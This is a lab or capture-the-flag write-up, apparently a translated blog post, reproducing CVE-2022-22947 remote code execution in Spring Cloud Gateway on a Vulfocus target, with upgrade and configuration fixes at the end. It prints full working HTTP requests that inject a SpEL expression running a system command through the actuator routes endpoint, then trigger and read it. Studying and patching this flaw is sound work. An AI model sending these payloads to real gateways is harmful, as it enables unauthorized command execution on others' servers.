Cve-2022-22947 recurrence of Remote Code Execution Vulnerability in spring cloud gateway

Time:2022-5-14

1、 Vulnerability overview

On March 1, 2022, VMware officially released a vulnerability report. When using the application of spring cloud gateway to open and expose the gateway actuator endpoint, it will be easy to cause code injection attack. The attacker can make malicious requests and carry out arbitrary remote execution on the remote host.
 
2、 Impact version

Spring Cloud Gateway 3.1.x < 3.1.1
Spring Cloud Gateway 3.0.x < 3.0.7
Older, unsupported versions will also be affected
 

3、 Vulnerability principle

The vernacular is: because shortcutconfigurable The getValue method in Java can be used by configurationservice This. Of the normalizeproperties function of configurablebuilder in the java package The properties parameter controls the modification. By adding a malicious route with filter, the attacker will trigger the normalization logic of the parameter when reloading the route, resulting in the spel expression in the filter parameter value being parsed.

Big guy article link: https://blog.csdn.net/include_voidmain/article/details/123819107

 

4、 Vulnerability recurrence environment

Kali Linux + Vulfocus
Infiltration machine: Kali Linux
Target: vulfocus

 

5、 Experimental steps

1. Open vulfoucs and obtain the experimental image

 

2. Visit the web page and capture the package

3. Construct and send malicious routing requests

POST /actuator/gateway/routes/hacktest HTTP/1.1
Host: 192.168.117.131:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like 		Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/json
Content-Length: 329

{
  "id": "hacktest",
 "filters": [{
"name": "AddResponseHeader",
"args": {
  "name": "Result",
  "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}"
}
  }],
  "uri": "http://example.com"
}
  • idThe name of the new route must be globally unique;

filters

    Field to specify several filters for this route. The filter is used to modify the request and response;

    • nameField specifies the filter to be added, and a filter is added hereAddResponseHeaderA filter for adding a response header before the gateway returns a response to the client;
    • args.nameField specifies the response header to be added;
    • args.valueField specifies the value of the response header. The value here is the spel expression to be executed for executionwhoamiCommand. Note that the newline character at the end of the command output needs to be removed, otherwise the filter will throw an exception saying “the value of the response header cannot end with \ R or \ n”;
    • uriField specifies to forward client requests tohttp://example.com。

 

4. Send this packet through the route before the application. This packet can trigger the expression

POST /actuator/gateway/refresh HTTP/1.1
Host: 192.168.117.131:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

 

 

5. Send this packet and check the command echo. You can see the previously added route

GET /actuator/gateway/routes/hacktest HTTP/1.1
Host: 192.168.117.131:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

 

6. Access the actor API interface

GET /actuator HTTP/1.1
Host: 192.168.117.131:8080
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

 

7. Access env interface and get flag

 

8. Sprinkle flowers after completion

 

6、 Repair method

1)3.1. X users should upgrade to 3.1.1 +;

2)3.0. X users should upgrade to 3.0.7 +;

3) If you do not need the actor function, you can use management endpoint. gateway. Enable: false configure to disable it.